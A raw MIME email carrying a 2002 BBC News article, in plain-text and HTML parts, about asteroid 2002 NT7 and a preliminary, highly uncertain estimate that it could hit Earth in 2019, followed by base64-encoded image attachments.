Many observations=20 Although astronomers say the object definitely merits attention, they = expect more observations to show it is not on an Earth-intersecting = trajectory.=20       This asteroid has now become the most threatening object in the = short history of asteroid detection=20     =20       Dr Benny Peiser =20 It was first seen on the night of 5 July, picked up by the Linear = Observatory's automated sky survey programme in New Mexico, US.=20 Since then astronomers worldwide have been paying close attention to it, = amassing almost 200 observations in a few weeks.=20 Could it be deflected?=20 Dr Benny Peiser, of Liverpool John Moores University in the UK, told BBC = News Online that "this asteroid has now become the most threatening = object in the short history of asteroid detection".=20 NT7 circles the Sun every 837 days and travels in a tilted orbit from = about the distance of Mars to just within the Earth's orbit.=20 Potential devastation=20 Detailed calculations of NT7's orbit suggest many occasions when its = projected path through space intersects the Earth's orbit.=20 Researchers estimate that on 1 February, 2019, its impact velocity on = the Earth would be 28 km a second - enough to wipe out a continent and = cause global climate changes.=20 However, Dr Peiser was keen to point out that future observations could = change the situation.=20 He said: "This unique event should not diminish the fact that additional = observations in coming weeks will almost certainly - we hope - eliminate = the current threat."=20 Easily observable=20 According to astronomers, NT7 will be easily observable for the next 18 = months or so, meaning there is no risk of losing the object.=20 Observations made over that period - and the fact that NT7 is bright = enough that it is bound to show up in old photographs - mean that = scientists will soon have a very precise orbit for the object.=20 Dr Donald Yeomans, of the US space agency's (Nasa) Jet Propulsion = Laboratory in California, told BBC News Online: "The orbit of this = object is rather highly inclined to the Earth's orbit so it has been = missed because until recently observers were not looking for such = objects in that region of space."=20 Regarding the possibility of an impact, Dr Yeomans said the = uncertainties were large.=20 "The error in our knowledge of where NT7 will be on 1 February, 2019, is = large, several tens of millions of kilometres," he said.=20 Dr Yeomans said the world would have to get used to finding more objects = like NT7 that, on discovery, look threatening, but then become harmless. = "This is because the problem of Near-Earth Objects is now being properly = addressed," he said.=20 ------=_NextPart_001_0010_01C23362.3939B510 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Not the computer game but = ....... Â  [URL]http://news.bbc[/URL] co.uk/1/hi/sci/tech/2147879.stm Â  Wednesday, 24 July, = 2002, 02:29=20 GMT 03:29 UK  Space rock 'on collision = course' =20 An asteroid could devastate=20 Earth By Dr David = Whitehouse=20       BBC News Online science = editor=20        An asteroid discovered just weeks = ago has=20 become the most threatening object yet detected in space.=20 A preliminary orbit suggests that 2002 NT7 is on an impact course = with Earth=20 and could strike the planet on 1 February, 2019 - although the = uncertainties are=20 large.=20 Astronomers have given the object a rating on the so-called Palermo = technical=20 scale of threat of 0.06, making NT7 the first object to be given a = positive=20 value.=20 From its brightness, astronomers estimate it is about two kilometres = wide,=20 large enough to cause continent-wide devastation on Earth.=20 Many observations=20 Although astronomers say the object definitely merits attention, they = expect=20 more observations to show it is not on an Earth-intersecting trajectory. = This asteroid has now become the most = threatening=20       object in the short history of asteroid detection  Dr Benny Peiser = It was first=20 seen on the night of 5 July, picked up by the Linear Observatory's = automated sky=20 survey programme in New Mexico, US.=20 Since then astronomers worldwide have been paying close attention to = it,=20 amassing almost 200 observations in a few weeks.=20 Could it be = deflected?=20 Dr Benny Peiser, of Liverpool John Moores University in the UK, told = BBC News=20 Online that "this asteroid has now become the most threatening object in = the=20 short history of asteroid detection".=20 NT7 circles the Sun every 837 days and travels in a tilted orbit from = about=20 the distance of Mars to just within the Earth's orbit.=20 Potential devastation=20 Detailed calculations of NT7's orbit suggest many occasions when its=20 projected path through space intersects the Earth's orbit.=20 Researchers estimate that on 1 February, 2019, its impact velocity on = the=20 Earth would be 28 km a second - enough to wipe out a continent and cause = global=20 climate changes.=20 However, Dr Peiser was keen to point out that future observations = could=20 change the situation.=20 He said: "This unique event should not diminish the fact that = additional=20 observations in coming weeks will almost certainly - we hope - eliminate = the=20 current threat."=20 Easily observable=20 According to astronomers, NT7 will be easily observable for the next = 18=20 months or so, meaning there is no risk of losing the object.=20 Observations made over that period - and the fact that NT7 is bright = enough=20 that it is bound to show up in old photographs - mean that scientists = will soon=20 have a very precise orbit for the object.=20 Dr Donald Yeomans, of the US space agency's (Nasa) Jet Propulsion = Laboratory=20 in California, told BBC News Online: "The orbit of this object is rather = highly=20 inclined to the Earth's orbit so it has been missed because until = recently=20 observers were not looking for such objects in that region of space."=20 Regarding the possibility of an impact, Dr Yeomans said the = uncertainties=20 were large.=20 "The error in our knowledge of where NT7 will be on 1 February, 2019, = is=20 large, several tens of millions of kilometres," he said.=20 Dr Yeomans said the world would have to get used to finding more = objects like=20 NT7 that, on discovery, look threatening, but then become harmless.=20 "This is because the problem of Near-Earth Objects is now being = properly=20 addressed," he said.=20 ------=_NextPart_001_0010_01C23362.3939B510-- ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: image/jpeg; 	name="_1644899_aster300.jpg" Content-Transfer-Encoding: base64 Content-Location: [URL]http://news.bbc.co.uk[/URL] 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 ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: image/gif; 	name="nothing.gif" Content-Transfer-Encoding: base64 Content-Location: [URL]http://news.bbc.co.uk[/URL] R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw== ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: image/gif; 	name="grey_pixel.gif" Content-Transfer-Encoding: base64 Content-Location: [URL]http://news.bbc.co.uk[/URL] R0lGODlhAQABAIAAAJmZmQAAACwAAAAAAQABAAACAkQBADs= ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: image/gif; 	name="startquote.gif" Content-Transfer-Encoding: base64 Content-Location: [URL]http://news.bbc.co.uk[/URL] R0lGODlhFwASAKL/AMvLmNXVouLir/Dwvf//zPn5x///zv//0CwAAAAAFwASAEADg0iqViErrvFM ACCMTQxzmLAV0iAEzyA1JyoUniJksNSBUExcWI8NBsPA5wuQbjONbtG4vDw4G2MIAEp4xMCU2BMI ubTYjAsphaSsjEpRSNZW0di3uoy4l2PBIWgbD/Y6WD1GHnNEZYI+QIZZbWB0TWBGBGM+ZWyVGEoM BAUkdZyeHQoJADs= ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: image/gif; 	name="endquote.gif" Content-Transfer-Encoding: base64 Content-Location: [URL]http://news.bbc.co.uk[/URL] R0lGODlhFwASAKL/AMvLmNXVouLir/DwvcDAwPn5xwAAAAAAACH5BAEAAAQALAAAAAAXABIAQANm SLrczgLICcYqgcpARhaPElUNpm3LcEogY7aPSnYZBYsnaK5WtwKchuzWGN0iwcfLIQg4iYpBMyDo 